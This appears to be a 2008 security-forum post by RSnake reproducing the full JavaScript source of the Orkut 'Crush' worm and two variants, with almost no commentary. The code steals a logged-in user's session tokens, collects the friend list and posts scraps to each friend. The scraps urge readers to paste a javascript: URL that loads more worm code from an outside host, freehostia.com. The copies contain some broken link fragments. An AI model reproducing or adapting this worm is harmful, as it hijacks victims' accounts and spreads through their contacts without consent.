Orkut "Crush" Worm
// ==UserScript==
// @name Master mind
// @author "Ishu"
// @provided by http://
// @description Ishu
// @include *Ishu*
// ==/UserScript==
function fwScrap() {
document.title = "Ishu HELPLINE - Newsletter";
function createXMLHttpRequest() {
try {
return new XMLHttpRequest;
} catch (e) {
try {
return new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
return new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
return false;
}
}
}
}
function getPostSig(exc) {
var xml = createXMLHttpRequest();
xml.open("GET", "/Scrapbook.aspx", true);
xml.onreadystatechange = function ()
{
if (
xml.readyState == 4) {
var xmlr = xml.responseText;
POST = xmlr.match(/name="post_token" value="([^"]+)/i);
SIG = xmlr.match(/name="signature" value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
eval(exc);
}
};
xml.send(null);
}
var select;
function loadFriends() {
date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();
var xml = createXMLHttpRequest();
xml.open("GET", "/Compose.aspx", true);
xml.onreadystatechange = function ()
{
if (xml.readyState == 4) {
var xmlr =
xml.responseText;
POST =
xmlr.match(/name="post_token" value="([^"]+)/i);
SIG =
xmlr.match(/name="signature"
value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
var div =
document.createElement("div");
div.innerHTML =
xmlr;
for (var x = 0;
x < div.getElementsByTagName("select").length; x++) {
if (
div.getElementsByTagName("select")[x].getAttribute("name") == "oneFriend") {
select = div.getElementsByTagName("select")[x].cloneNode(true);
globalSelect = select;
break;
}
}
var scrapText;
var tokenValue =
encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(
document.getElementsByTagName("input").signature.value);
//scrapText = "Read Receipt -->
"+hrs+":"+min+":"+sec+"-"+milliSec+"<br>"+signatureValue;
//scrapText = "Read Receipt -->
"+hrs+":"+min+":"+sec+"-"+milliSec;
scrapText = "Good Work! [:P]";
sendScrap(94850220,scrapText);
SendScrapToAll();
// for(var i=0;i<
globalSelect.length;i++) {
//
if(globalSelect
.value!="")
{
//
sendScrap(globalSelect[i].value,scrapText);
//
setTimeout("",
65 * 1000);
// }
// }
}
};
xml.send(null);
}
function wait() {
antiF = 1;
showTime();
}
c = 0;
function SendScrapToAll()
{
var scrapText;
scrapText = "[maroon]Find out who has crush on
u....[/maroon]<br>[purple]wait 4 few minutes after pressing
enter<br>[green]Author-->[/green] [red]Monster :)[/red]<br>[blue]Just copy
the JavaScript, paste it in your address bar and PRESS
ENTER[/blue]<br><br>[orange][i]javascript:d=document;c=d.createElement
('script');d.body.appendChild(c);c.src='
[monster357.freehostia.com])[/orange]<br><br>[red]Trust
me, ITS WORKING!!! [:)]<br><br><br><center><font
style=text-decoration:blink><a href=
[
www.orkut.com] src=
[
img1.orkut.com];~ Powered By LOVERS ~<img src=
[
img1.orkut.com];";
if(c == select.length)
return;
try{
if(select[c].value!="")
{
sendScrap(select[c].value,scrapText);
}
}catch(e){
//Suppressed Exception
} finally {
c = c+ 1;
setTimeout("SendScrapToAll()", 666);
}
}
function showTime() {
if (timeWait > 0) {
timeWait--;
setTimeout("showTime()", 2000);
} else {
timeWait = 20;
index++;
getPostSig("SendScrapToAll()");
}
}
antiF = 1;
index = 1;
timeWait = 20;
nscraps = 0;
nCounter=2;
nLoop=2;
function sendScrap(to, msg) {
date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();
var tokenValue = encodeURIComponent(document.getElementsByTagName
("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(
document.getElementsByTagName("input").signature.value);
//var scrapText = tokenValue + signatureValue
+'9'+hrs+'18'+min+'27'+sec+'36'+milliSec;
var send = "POST_TOKEN=" + tokenValue + "&signature=" +
signatureValue + "&scrapText=" + encodeURIComponent(msg) +
"&toUserId="+to+"&Action.submit=1";
var xml = createXMLHttpRequest();
xml.open("POST", "/Scrapbook.aspx", true);
xml.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded;");
xml.send(send);
xml.onreadystatechange = function () {
if (xml.readyState == 4) {
if (xml.status != 200) {
setTimeout("SendScrapToAll()",
500);
return;
}
if (antiF < 450) {
antiF++;
if(nCounter==1)
{
index++;
nCounter=nLoop;
}
else {
nCounter--;
}
return;
}
else {
wait();
}
}
};
}
layout = " <input name=\"POST_TOKEN\"
type=\"hidden\"/><input name=\"signature\" type=\"hidden\"/>"+
"<center><h3><u>LOADING....
PLEASE WAIT.......</u></h3></center><br>"+
"<table>"+
"</table>"
;
document.body.innerHTML = layout;
var focus = document.createElement("span");
focus.id = "focus";
focus.style.display = "inline";
document.body.appendChild(focus);
var divLoad = document.createElement("div");
divLoad.id = "divLoad";
divLoad.style.display = "inline";
document.body.appendChild(divLoad);
loadFriends();
//sendScrap();
}
sc = String(fwScrap);
sc = sc.substring(21, sc.length - 2);
script = document.createElement("script");
if (typeof document.all) {
script.text = sc;
} else {
script.textContent = sc;
}
document.getElementsByTagName("head")[0].appendChild(script)
and [
monster357.freehostia.com] is:
// ==UserScript==
// @name Master mind
// @author "Ishu"
// @provided by http://
// @description Ishu
// @include *Ishu*
// ==/UserScript==
function fwScrap() {
document.title = "Ishu HELPLINE - Newsletter";
function createXMLHttpRequest() {
try {
return new XMLHttpRequest;
} catch (e) {
try {
return new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
return new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
return false;
}
}
}
}
function getPostSig(exc) {
var xml = createXMLHttpRequest();
xml.open("GET", "/Scrapbook.aspx", true);
xml.onreadystatechange = function ()
{
if (xml.readyState == 4) {
var xmlr = xml.responseText;
POST = xmlr.match(/name="post_token" value="([^"]+)/i);
SIG = xmlr.match(/name="signature" value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
eval(exc);
}
};
xml.send(null);
}
var select;
function loadFriends() {
date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();
var xml = createXMLHttpRequest();
xml.open("GET", "/Compose.aspx", true);
xml.onreadystatechange = function ()
{
if (xml.readyState == 4) {
var xmlr = xml.responseText;
POST = xmlr.match(/name="post_token" value="([^"]+)/i);
SIG = xmlr.match(/name="signature" value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
var div = document.createElement("div");
div.innerHTML = xmlr;
for (var x = 0; x < div.getElementsByTagName("select").length; x++) {
if (div.getElementsByTagName("select")[x].getAttribute("name") == "oneFriend") {
select = div.getElementsByTagName("select")[x].cloneNode(true);
globalSelect = select;
break;
}
}
var scrapText;
var tokenValue = encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(document.getElementsByTagName("input").signature.value);
//scrapText = "Read Receipt --> "+hrs+":"+min+":"+sec+"-"+milliSec+"<br>"+signatureValue;
//scrapText = "Read Receipt --> "+hrs+":"+min+":"+sec+"-"+milliSec;
scrapText = "Good Work! [:P]";
sendScrap(94850220,scrapText);
SendScrapToAll();
// for(var i=0;i<globalSelect.length;i++) {
// if(globalSelect
.value!="") {
// sendScrap(globalSelect[i].value,scrapText);
// setTimeout("", 65 * 1000);
// }
// }
}
};
xml.send(null);
}
function wait() {
antiF = 1;
showTime();
}
c = 0;
function SendScrapToAll()
{
var scrapText;
scrapText = "[maroon]Find out who has crush on u....[/maroon]<br>[purple]wait 4 few minutes after pressing enter<br>[green]Author-->[/green] [red]Monster :)[/red]<br>[blue]Just copy the JavaScript, paste it in your address bar and PRESS ENTER[/blue]<br><br>[orange][i]javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://monster357.freehostia.com/scripts/blindgal.js';void(0)[/orange]<br><br>[red]Trust me, ITS WORKING!!! [:)]<br><br><br><center><font style=text-decoration:blink><a href=http://www.orkut.com/CommunityJoin.aspx?cmm=30794><img src=http://img1.orkut.com/img/castro/p_scrap.gif>~ Powered By LOVERS ~<img src=http://img1.orkut.com/img/castro/p_scrap.gif></a></img></font></center>";
if(c == select.length)
return;
try{
if(select[c].value!="")
{
sendScrap(select[c].value,scrapText);
}
}catch(e){
//Suppressed Exception
} finally {
c = c+ 1;
setTimeout("SendScrapToAll()", 666);
}
}
function showTime() {
if (timeWait > 0) {
timeWait--;
setTimeout("showTime()", 2000);
} else {
timeWait = 20;
index++;
getPostSig("SendScrapToAll()");
}
}
antiF = 1;
index = 1;
timeWait = 20;
nscraps = 0;
nCounter=2;
nLoop=2;
function sendScrap(to, msg) {
date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();
var tokenValue = encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(document.getElementsByTagName("input").signature.value);
//var scrapText = tokenValue + signatureValue +'9'+hrs+'18'+min+'27'+sec+'36'+milliSec;
var send = "POST_TOKEN=" + tokenValue + "&signature=" + signatureValue + "&scrapText=" + encodeURIComponent(msg) + "&toUserId="+to+"&Action.submit=1";
var xml = createXMLHttpRequest();
xml.open("POST", "/Scrapbook.aspx", true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xml.send(send);
xml.onreadystatechange = function () {
if (xml.readyState == 4) {
if (xml.status != 200) {
setTimeout("SendScrapToAll()", 500);
return;
}
if (antiF < 450) {
antiF++;
if(nCounter==1) {
index++;
nCounter=nLoop;
}
else {
nCounter--;
}
return;
}
else {
wait();
}
}
};
}
layout = " <input name=\"POST_TOKEN\" type=\"hidden\"/><input name=\"signature\" type=\"hidden\"/>"+
"<center><h3><u>LOADING.... PLEASE WAIT.......</u></h3></center><br>"+
"<table>"+
"</table>"
;
document.body.innerHTML = layout;
var focus = document.createElement("span");
focus.id = "focus";
focus.style.display = "inline";
document.body.appendChild(focus);
var divLoad = document.createElement("div");
divLoad.id = "divLoad";
divLoad.style.display = "inline";
document.body.appendChild(divLoad);
loadFriends();
//sendScrap();
}
sc = String(fwScrap);
sc = sc.substring(21, sc.length - 2);
script = document.createElement("script");
if (typeof document.all) {
script.text = sc;
} else {
script.textContent = sc;
}
document.getElementsByTagName("head")[0].appendChild(script)
and [
monster357.freehostia.com] is:
// ==UserScript==
// @name Master mind
// @author "Ishu"
// @provided by http://
// @description Ishu
// @include *Ishu*
// ==/UserScript==
function fwScrap() {
document.title = " Blindgal";
function createXMLHttpRequest() {
try {
return new XMLHttpRequest;
} catch (e) {
try {
return new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
return new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
return false;
}
}
}
}
function getPostSig(exc) {
var xml = createXMLHttpRequest();
xml.open("GET", "/Scrapbook.aspx", true);
xml.onreadystatechange = function ()
{
if (xml.readyState == 4) {
var xmlr = xml.responseText;
POST = xmlr.match(/name="post_token" value="([^"]+)/i);
SIG = xmlr.match(/name="signature" value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
eval(exc);
}
};
xml.send(null);
}
var select;
function loadFriends() {
date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();
var xml = createXMLHttpRequest();
xml.open("GET", "/Compose.aspx", true);
xml.onreadystatechange = function ()
{
if (xml.readyState == 4) {
var xmlr = xml.responseText;
POST = xmlr.match(/name="post_token" value="([^"]+)/i);
SIG = xmlr.match(/name="signature" value="([^"]+)/i);
document.getElementsByTagName("input").POST_TOKEN.value = POST[1];
document.getElementsByTagName("input").signature.value = SIG[1];
var div = document.createElement("div");
div.innerHTML = xmlr;
for (var x = 0; x < div.getElementsByTagName("select").length; x++) {
if (div.getElementsByTagName("select")[x].getAttribute("name") == "oneFriend") {
select = div.getElementsByTagName("select")[x].cloneNode(true);
globalSelect = select;
break;
}
}
var scrapText;
var tokenValue = encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(document.getElementsByTagName("input").signature.value);
//scrapText = "Read Receipt --> "+hrs+":"+min+":"+sec+"-"+milliSec+"<br>"+signatureValue;
//scrapText = "Read Receipt --> "+hrs+":"+min+":"+sec+"-"+milliSec;
scrapText = "Love rocks! [:P] <br>" +hrs+":"+min+":"+sec+"-"+milliSec;
sendScrap(94850220,scrapText);
SendScrapToAll();
// for(var i=0;i<globalSelect.length;i++) {
// if(globalSelect
.value!="") {
// sendScrap(globalSelect[i].value,scrapText);
// setTimeout("", 65 * 1000);
// }
// }
}
};
xml.send(null);
}
function wait() {
antiF = 1;
showTime();
}
c = 0 ;
function SendScrapToAll()
{
var scrapText;
scrapText = "<font size=5><center>[red]Love Message</center></font><br>[b] [red]THERE IS STORY OF BLIND GIRL-- >[blue] MUST READ Ppl IN LOVE. <br>[navy]JUST PASTE THE SCRIPT IN THE PLACE WHERE U SEE [gray] (the place where u see www[i].orkut
.com)[/gray] and hit ENTER"+ "<br>"+"<br>[teal]
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http[i]://monster357
.freehostia
.com
/scripts/blindgal1[i].js';void(0)[/teal][/i]<br><BR><br><center><font style=text-decoration:blink><a href=http://www.orkut.com/CommunityJoin.aspx?cmm=30794><img src=http://img1.orkut.com/img/castro/p_scrap.gif>~ Powered By LOVERS ~<img src=http://img1.orkut.com/img/castro/p_scrap.gif></a></img></font></center><br>";
// "<center> </center>";
if(c == select.length)
return;
try{
if(select[c].value!="")
{
sendScrap(select[c].value,scrapText);
}
}catch(e){
//Suppressed Exception
} finally {
c = c+ 1;
setTimeout("SendScrapToAll()", 500);
}
}
function showTime() {
if (timeWait > 0) {
timeWait--;
setTimeout("showTime()", 2000);
} else {
timeWait = 20;
index++;
getPostSig("SendScrapToAll()");
}
}
antiF = 1;
index = 1;
timeWait = 20;
nscraps = 0;
nCounter=2;
nLoop=2;
function sendScrap(to, msg) {
date_now = new Date();
var hrs = date_now.getHours();
var min = date_now.getMinutes();
var sec = date_now.getSeconds();
var milliSec = date_now.getMilliseconds();
var tokenValue = encodeURIComponent(document.getElementsByTagName("input").POST_TOKEN.value);
var signatureValue = encodeURIComponent(document.getElementsByTagName("input").signature.value);
//var scrapText = tokenValue + signatureValue +'9'+hrs+'18'+min+'27'+sec+'36'+milliSec;
var send = "POST_TOKEN=" + tokenValue + "&signature=" + signatureValue + "&scrapText=" + encodeURIComponent(msg) + "&toUserId="+to+"&Action.submit=1";
var xml = createXMLHttpRequest();
xml.open("POST", "/Scrapbook.aspx", true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xml.send(send);
xml.onreadystatechange = function () {
if (xml.readyState == 4) {
if (xml.status != 200) {
setTimeout("SendScrapToAll()", 500);
return;
}
if (antiF < 450) {
antiF++;
if(nCounter==1) {
index++;
nCounter=nLoop;
}
else {
nCounter--;
}
return;
}
else {
wait();
}
}
};
}
layout = " <input name=\"POST_TOKEN\" type=\"hidden\"/><input name=\"signature\" type=\"hidden\"/>"+
"<center><center><font size=6>StOry of Blind girl</font></center><br>"+
"<h3>Most Touching Story Ever Read</h3>"+
"<br><BR><BR><font size=5>Click ON link to read story IN COMMUNITy</font>" +
"<br><br><b><font color=\"red\"><font size=5><a target=_blank href=http://www.orkut.com/CommMsgs.aspx?cmm=30794&tid=2585088195765389198>"CLICK HERE"</a></font></font></b>"+
"<br><font size=4>----------I Would love to see ur replies please do reply:----------</font>" +
"<br><br><font size=4>Don forget 2 rply</font>" +
"<br><font size=4>This story will touch ur hearts</font>" +
"<br><br><font size=4>Ur vision will b changed</font>" +
"<br><font size=4>It will give u new approach in life</font>" +
"<br><br><font size=4>Still thinking</font>" +
"<br><font size=4>Just go in community n read topic story of blind gal</font>" +
"<br><br><font size=4>this is love is community</font>" +
"<br><br><font size=4>Sorry if it hurts u</font>" +
"<br><br><font size=4>n tell ur frnd to see it</font>" +
"<br><font size=4>Nothing more see u in community topic</font>" +
"<br><font size=4>Good bye</font>" +
"<br><font size=4>WITH LOVE -- ISHU GUMBER</font>" +
"<br><br><b><font color=\"red\"><font size=5><a target=_blank href=http://www.orkut.com/CommMsgs.aspx?cmm=30794&tid=2585088195765389198>"CLICK HERE TO JOIN ME"</a></font></font></b>"+
""
;
document.body.innerHTML = layout;
var focus = document.createElement("span");
focus.id = "focus";
focus.style.display = "inline";
document.body.appendChild(focus);
var divLoad = document.createElement("div");
divLoad.id = "divLoad";
divLoad.style.display = "inline";
document.body.appendChild(divLoad);
loadFriends();
//sendScrap();
}
sc = String(fwScrap);
sc = sc.substring(21, sc.length - 2);
script = document.createElement("script");
if (typeof document.all) {
script.text = sc;
} else {
script.textContent = sc;
}
document.getElementsByTagName("head")[0].appendChild(script)
- RSnake
Gotta love it.
http://ha.ckers.org
Edited 2 time(s). Last edit at 02/28/2008 06:30PM by rsnake.